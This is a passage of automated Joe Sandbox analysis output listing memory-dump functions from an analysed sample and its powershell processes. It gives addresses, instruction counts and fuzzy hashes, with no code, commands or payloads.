                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ._^$._^$._^$._^$._^$._^
                                                                                                                                                                    • API String ID: 0-3246280797
                                                                                                                                                                    • Opcode ID: 6a09e031ffd417d73d2848d459e382f003281828ece385c5ad5a513135705da6
                                                                                                                                                                    • Instruction ID: 2fa8b9af73e4c9c95e6e0383a89bd7fb765ef4dd16ccb83a58abac9c651e1df1
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a09e031ffd417d73d2848d459e382f003281828ece385c5ad5a513135705da6
                                                                                                                                                                    • Instruction Fuzzy Hash: E8816E76A0FA8D8FD7219F6888751E93FA0FF15314B0901B7D098875E3ED796946C381
                                                                                                                                                                    Function 00007FFD9BA886FA Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1765727823.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba80000_zZ1Y43bxxV.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ._^$._^$._^$._^
                                                                                                                                                                    • API String ID: 0-972220895
                                                                                                                                                                    • Opcode ID: 9faab4a803d5f726714b3afcfb3fb922d399673319984c16200a31c05d89e56f
                                                                                                                                                                    • Instruction ID: 5aa21ef37ab84b839bd7e4ae0d8af3fdf58a40de2779af77fec501a18d516c4d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9faab4a803d5f726714b3afcfb3fb922d399673319984c16200a31c05d89e56f
                                                                                                                                                                    • Instruction Fuzzy Hash: D6212BEFA0A1994BD3152B9D6C370F53FD0EF2532CBA91076D6BD0B593F8682506C245

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B8A604D Relevance: .7, Instructions: 700COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0f303c952c295061bf1c7b5c5f7e6aed5bb7d5e1733234f4fcfbadb08fd83c17
                                                                                                                                                                    • Instruction ID: 49591481957efc5ca8d537ef82041d7241e986f8d3e378a569654fddacd169d3
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f303c952c295061bf1c7b5c5f7e6aed5bb7d5e1733234f4fcfbadb08fd83c17
                                                                                                                                                                    • Instruction Fuzzy Hash: B4912997B0E6A64AD32677AC7C7A0F53F60DF9217670901B7D188CA0A7ED18650B82E1
                                                                                                                                                                    Function 00007FFD9B976605 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2697392055.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b46380f9073ad94bffec1893bdf497df76494580d084606f70e1c90af84c8529
                                                                                                                                                                    • Instruction ID: 07565a8ff45e90f1aea0da57754a4ca84cc78b90b72e2eef1e4513d9aba8f76d
                                                                                                                                                                    • Opcode Fuzzy Hash: b46380f9073ad94bffec1893bdf497df76494580d084606f70e1c90af84c8529
                                                                                                                                                                    • Instruction Fuzzy Hash: D5D14632A2FB8D1FEBA5DB6848A55B57BE0EF56350B0901FED05DCB0E7DA18AC058341
                                                                                                                                                                    Function 00007FFD9B8A9728 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0aea27d4d7aaf425333289ff1eb6d04c0430820d406d65a677d936c85ae7e5f3
                                                                                                                                                                    • Instruction ID: a8b1ad23c575677217a878955997ee2b570f47b02f857eae603a3d37432c02d0
                                                                                                                                                                    • Opcode Fuzzy Hash: 0aea27d4d7aaf425333289ff1eb6d04c0430820d406d65a677d936c85ae7e5f3
                                                                                                                                                                    • Instruction Fuzzy Hash: C3413B7190DB888FDB189F5CA8496A87FE1FF59310F4482AFE05883193DB64B9158BD2
                                                                                                                                                                    Function 00007FFD9B78EE24 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2682762198.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b78d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ccf1307c83b6c12ac2bb0b8d1276404c0adfc9e411c1bad167465f2c547783c1
                                                                                                                                                                    • Instruction ID: 76a3da8bf0f66e81f72e2f7a14f8bb84d2bd7a06c0ec53490d403005c280dfb9
                                                                                                                                                                    • Opcode Fuzzy Hash: ccf1307c83b6c12ac2bb0b8d1276404c0adfc9e411c1bad167465f2c547783c1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6541267180EBC84FE7669B3898559523FF0EF57321B1A06DFD088CB1B3D625A846C792
                                                                                                                                                                    Function 00007FFD9B8AA4AC Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6b08bd3f6c59179f7f74d324b43c23ab8aa18ba31ba6d6292cfd54277f9edf5a
                                                                                                                                                                    • Instruction ID: 8121a593bd50ba0fa7ea4042ee7ca6d562837ad61ea51d2a2c56d2d492993f52
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b08bd3f6c59179f7f74d324b43c23ab8aa18ba31ba6d6292cfd54277f9edf5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D21F83190CB8C4FDB59DBAC984A7E97FE0EB96321F04416FD449C3162D674A416CB92
                                                                                                                                                                    Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                    Function 00007FFD9B8A9CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fa59cbce7b91260308e51566c07a78fa3ca27280f5a5f498ba06d49041627e7f
                                                                                                                                                                    • Instruction ID: 70265af830595af227f5d706d8fa1733a46c70e9991a9b2456cfec3dd018e7d1
                                                                                                                                                                    • Opcode Fuzzy Hash: fa59cbce7b91260308e51566c07a78fa3ca27280f5a5f498ba06d49041627e7f
                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0243180C68D8FDB0AEF2888294D57FA0EF16310B0502DBE448C70B2DB749598CB92
                                                                                                                                                                    Function 00007FFD9B97414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2697392055.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction ID: 12f33f0deeb6a006eecc4bd5a5208b4863b17aefbd46ea5c68febf94c72bccda
                                                                                                                                                                    • Opcode Fuzzy Hash: 11d8bb04571b61efb343b02d51918ce64ce82ac9ab8d4d89d5254af000579169
                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0BE32B1E5098FD768EA5CE4919A873E0EF6533071640BAE06DC76B3CA25EC40C785
                                                                                                                                                                    Function 00007FFD9B974400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2697392055.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction ID: 129b33f44cb8e93545e7d3cdafabe1f671a871c4de9137186345812d3433b547
                                                                                                                                                                    • Opcode Fuzzy Hash: 04ddc4e4dca0313fa1c4408041f8b996914b53924da645ff4070bb2900347b69
                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0BE32A0E5498FD764EA5CE4A09A873E0EF0532076600FAE05DCB1B3CA25AC40CB40
                                                                                                                                                                    Function 00007FFD9B9741D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2697392055.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9B8A8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2691969115.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                    • API String ID: 0-1031638419
                                                                                                                                                                    • Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                                                                                                    • Instruction ID: a5b840d0c2db3ff69127c8c8df66edfaabb6974264c93a20f8ecd2169fedd3ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
                                                                                                                                                                    • Instruction Fuzzy Hash: 162127B77084269ED30A77ADBC159EC7380DBD427A34951B3D368CB553EA14A08B8AE0

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B76E540 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2636490349.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b76d000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: QZ~
                                                                                                                                                                    • API String ID: 0-4217409775
                                                                                                                                                                    • Opcode ID: 7d672d9ecce40d22529df1396b70d00af824f752acffc67869fcc0ad7ae03dba
                                                                                                                                                                    • Instruction ID: bac16e16565d5fd1f355716628b8a3926635a29ab71b431103fde6c80bca526e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d672d9ecce40d22529df1396b70d00af824f752acffc67869fcc0ad7ae03dba
                                                                                                                                                                    • Instruction Fuzzy Hash: 1441F67140EBC48FE7569B289C559523FF0EF52320B1A06DFD088CB1B7D625A845C7A3
                                                                                                                                                                    Function 00007FFD9B88B408 Relevance: .5, Instructions: 460COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 20c5caa314611ef30194277e21baa0ece4bb22cce1f1494884a482afc2089b57
                                                                                                                                                                    • Instruction ID: ff76f7586c975f23486080f7b59f10eba6b78627e9f0155bd2d29b77b4be03f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 20c5caa314611ef30194277e21baa0ece4bb22cce1f1494884a482afc2089b57
                                                                                                                                                                    • Instruction Fuzzy Hash: C6D16730A0DB894FD758EF6CC894AB57BE1EF99310F1401BED099C32A6DA35E846C741
                                                                                                                                                                    Function 00007FFD9B956605 Relevance: .5, Instructions: 454COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6a7afd0509884bcc8622cd841a1e816c65077e7e2b2cc899e8630c4d28fc0538
                                                                                                                                                                    • Instruction ID: 5295ad609a129ad75e081967375b5cfb224aa9f4701a74441e84b6e3a8754b8b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a7afd0509884bcc8622cd841a1e816c65077e7e2b2cc899e8630c4d28fc0538
                                                                                                                                                                    • Instruction Fuzzy Hash: 07D14832A1FB8E5FEBA59BA848645B57BA0EF56310B0901FED85CCB0E3D958AD05C341
                                                                                                                                                                    Function 00007FFD9B889D06 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f742d4fc0b01243367923f126bb90d59c12217d35dc454f7395c7c08ed820e9f
                                                                                                                                                                    • Instruction ID: 9e9f00248650a92490a5acaac9c3c3151989447fab8271d6305328845d50a11d
                                                                                                                                                                    • Opcode Fuzzy Hash: f742d4fc0b01243367923f126bb90d59c12217d35dc454f7395c7c08ed820e9f
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D016D7594EBCC8FC7579B6888284A47FF0EF1A200B0A41E7D499CB1B3D6799918C782
                                                                                                                                                                    Function 00007FFD9B889718 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ddddb0af9161e1cd44d067ee774e839aef39a2695a23eaa149ca910d1dfd4349
                                                                                                                                                                    • Instruction ID: 79e18a2355ffefeef245b83a1bcf0bf18675a69c0af1b22d051e0a1bfe90385d
                                                                                                                                                                    • Opcode Fuzzy Hash: ddddb0af9161e1cd44d067ee774e839aef39a2695a23eaa149ca910d1dfd4349
                                                                                                                                                                    • Instruction Fuzzy Hash: 42412C71A0EE888FDB199F5C58596A8BBE0FB59310F5441BFD09883293DA34B945C7C2
                                                                                                                                                                    Function 00007FFD9B88BFA9 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ffaa2335621dee5614744b7eaddd75ebcb1ecc4c50aeb94087a9d95b9d9cab6a
                                                                                                                                                                    • Instruction ID: c35618869688e340e7ed358042d61ba92f48441c2496d51e1336e50a0b92d497
                                                                                                                                                                    • Opcode Fuzzy Hash: ffaa2335621dee5614744b7eaddd75ebcb1ecc4c50aeb94087a9d95b9d9cab6a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E01FC3271CA094FDB9CDF1CE85197473E1EBD8320B1001BEE45AC3297D926F8528741
                                                                                                                                                                    Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                                                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                                                                                    • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                                                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                                                                                    Function 00007FFD9B88C018 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 410d45415105ec2b79a73a5151b166009a6d59437c96258b718101f0952ad60d
                                                                                                                                                                    • Instruction ID: ea871f9ad6c0cef9deeb1ca1db51dfaa4c3378a7d77dc59c23ee9703173be2ad
                                                                                                                                                                    • Opcode Fuzzy Hash: 410d45415105ec2b79a73a5151b166009a6d59437c96258b718101f0952ad60d
                                                                                                                                                                    • Instruction Fuzzy Hash: 52F06C3175C6058FDB5C9A1CF85297573D1E799320B10016EF48BC3697D927F843C645
                                                                                                                                                                    Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7becca6c9032fdb6e397fb8aeb90693864d27c72c50bd10d939f524cd3bfb83f
                                                                                                                                                                    • Instruction ID: aa47712430419ba0678b77f383942f638eb2594a260fb7df213853954f15f732
                                                                                                                                                                    • Opcode Fuzzy Hash: 7becca6c9032fdb6e397fb8aeb90693864d27c72c50bd10d939f524cd3bfb83f
                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0E932B4D5098FD7A8EB9CE4519E473E0EF65320B1640BAE06DC71B7CA25EC40C741
                                                                                                                                                                    Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f727aab171418d43dc6c2d4290f30c4e0c09f86382a01e8b1e4e514e11766a96
                                                                                                                                                                    • Instruction ID: d4b113d18a9f662398950c1d0971590b8fa8e6e0902e3deaddff09dfcad7d7d2
                                                                                                                                                                    • Opcode Fuzzy Hash: f727aab171418d43dc6c2d4290f30c4e0c09f86382a01e8b1e4e514e11766a96
                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0B431A4D5498FD7A4EA9CE0609A873E0EF0532075600BAE05DCB1A7CA25BC40C740
                                                                                                                                                                    Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2656951485.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b950000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                    • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                                                                                                                                    Function 00007FFD9B88A2CA Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a6859af6e56dcd57312c0820acada789531ea0af2712d70a0bf8843c17e1c935
                                                                                                                                                                    • Instruction ID: 2bd4b7452e8ca639556a101ba233e37e207cd3d88c8fb42445df63553e6ec566
                                                                                                                                                                    • Opcode Fuzzy Hash: a6859af6e56dcd57312c0820acada789531ea0af2712d70a0bf8843c17e1c935
                                                                                                                                                                    • Instruction Fuzzy Hash: B1E01A35909A4D8FCB55EF18C85A8E97BA0FF68201B01429BE81DC7161EB719A58CBC2

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00007FFD9B8884E3 Relevance: 6.4, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2650001262.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b880000_powershell.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                    • API String ID: 0-2528851458
